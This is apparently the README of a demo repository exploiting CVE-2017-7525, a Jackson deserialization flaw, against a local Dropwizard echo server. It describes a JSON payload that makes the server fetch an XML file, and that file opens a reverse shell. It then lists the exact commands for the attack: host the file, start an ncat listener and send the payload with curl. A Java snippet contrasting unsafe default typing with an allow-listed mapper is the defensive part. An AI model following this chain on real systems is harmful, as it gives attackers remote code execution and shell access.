jault3/jackson-databind-exploit

jackson-databind-exploit

Example exploit of CVE-2017-7525. This application runs a local Dropwizard web server on port 8888 under the /application context. There is one route, /application/echo, which echoes back the JSON that you send it.

  • exploit.json: The JSON payload to send the server. This tells the server to download an XML file from localhost:8000/spel.xml
  • spel.xml: The XML payload which tells the server to open up a shell and send the prompt to localhost:4444
  • important.txt: Example important file that you can demonstrate being able to read and/or modify in a demo
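
The configuration choice that decides whether a type-id payload like exploit.json can reach an arbitrary class is the ObjectMapper's default-typing setup. The following is an added illustration, not code from this repository: it contrasts the legacy `enableDefaultTyping` pattern (which resolves any class name the client supplies) with the allow-listed `activateDefaultTyping` available in jackson-databind 2.10+. `DefaultTypingDemo` and `Greeting` are hypothetical names, and `java.util.ArrayList` stands in as a benign "not on the allow list" type.

```java
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    /** Hypothetical application model type; the only polymorphic subtype we intend to accept. */
    public static class Greeting {
        public String text;
    }

    /** Vulnerable pattern: any class name found in the type-id slot is resolved and instantiated. */
    static ObjectMapper vulnerableMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); // deprecated since 2.10
        return mapper;
    }

    /** Hardened pattern (jackson-databind 2.10+): subtypes outside the allow list are rejected. */
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Greeting.class)   // only our own model type may be named by the client
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    /** Returns true if the mapper was willing to deserialize the body into Object. */
    static boolean accepts(ObjectMapper mapper, String body) {
        try {
            mapper.readValue(body, Object.class);
            return true;
        } catch (JsonMappingException e) {   // InvalidTypeIdException for a denied subtype
            return false;
        } catch (java.io.IOException e) {    // malformed JSON
            return false;
        }
    }

    public static void main(String[] args) {
        // Default typing uses the WRAPPER_ARRAY form: ["fully.qualified.ClassName", value].
        String model   = "[\"" + Greeting.class.getName() + "\", {\"text\": \"hi\"}]";
        String foreign = "[\"java.util.ArrayList\", []]";   // constructed: a JDK type not on the allow list

        System.out.println("hardened accepts model type:    " + accepts(hardenedMapper(), model));   // true
        System.out.println("hardened accepts foreign type:  " + accepts(hardenedMapper(), foreign)); // false
        System.out.println("vulnerable accepts foreign type: " + accepts(vulnerableMapper(), foreign)); // true
    }
}
```

For an endpoint that only needs to echo JSON, the simplest fix is to deserialize into `JsonNode` on a mapper with default typing never activated at all.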

Running

Open up 4 terminals and run the following commands in each (make sure you are in the application directory for all terminals):

Terminal 1

Spin up the application:

./gradlew run

Terminal 2

Spin up a python server to host the spel.xml file:

python3 -m http.server -b 127.0.0.1 8000

Terminal 3

Open a netcat listener on port 4444; this is the terminal that waits for the reverse shell connection:

ncat -lv 127.0.0.1 4444

Terminal 4

Send the payload (this will open up a reverse shell in Terminal 3):

curl -i -XPOST -H 'Content-Type: application/json' localhost:8888/application/echo -d @exploit.json
